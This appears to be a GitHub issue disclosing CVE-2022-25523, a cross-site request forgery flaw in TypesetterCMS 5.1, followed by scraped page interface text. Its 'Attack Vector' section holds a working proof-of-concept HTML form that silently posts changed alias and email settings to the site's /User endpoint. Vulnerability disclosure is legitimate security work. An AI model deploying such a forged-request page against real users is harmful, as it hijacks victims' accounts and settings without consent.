CSRF Vulnerabilities in TypesetterCMS (Version - 5.1)  [CVE-2022-25523]

TypesetterCMS v5.1 was discovered to contain a Cross-Site Request
 Forgery (CSRF) which is exploited via a crafted POST request.

**Vulnerability Type**
Cross-Site Request Forgery (CSRF)

**Vendor of Product**
TypesetterCMS

**Affected Product Code Base**
TypesetterCMS - =5.1 are effected

Affected Component
**All the POST requests**

**Attack Type**
Remote

**Impact Escalation of Privileges**
true

### Attack Vector
```
 <html>
   
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://www.typesettercms.com/User" method="POST">
       <input type="hidden" name="alias" value="TEST&#43;1" />
       <input type="hidden" name="homepage" value="" />
       <input type="hidden" name="email" value="TEST&#43;1&#64;gmail&#46;com" />
      <input type="hidden" name="cmd" value="Save&#32;Settings" />
      <input type="hidden" name="verified" value="" />
     <input type="submit" value="Submit request" />
     </form>
   </body>
  </html>
```

**Discoverers**
Danish Tariq
Ali Hassan Ghori 

**Reference**
http://typesettercms.com
https://www.typesettercms.com/User

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

CSRF Vulnerabilities in TypesetterCMS (Version - 5.1) [CVE-2022-25523] #697

Attack Vector

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

CSRF Vulnerabilities in TypesetterCMS (Version - 5.1) [CVE-2022-25523] #697

Description

Attack Vector

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions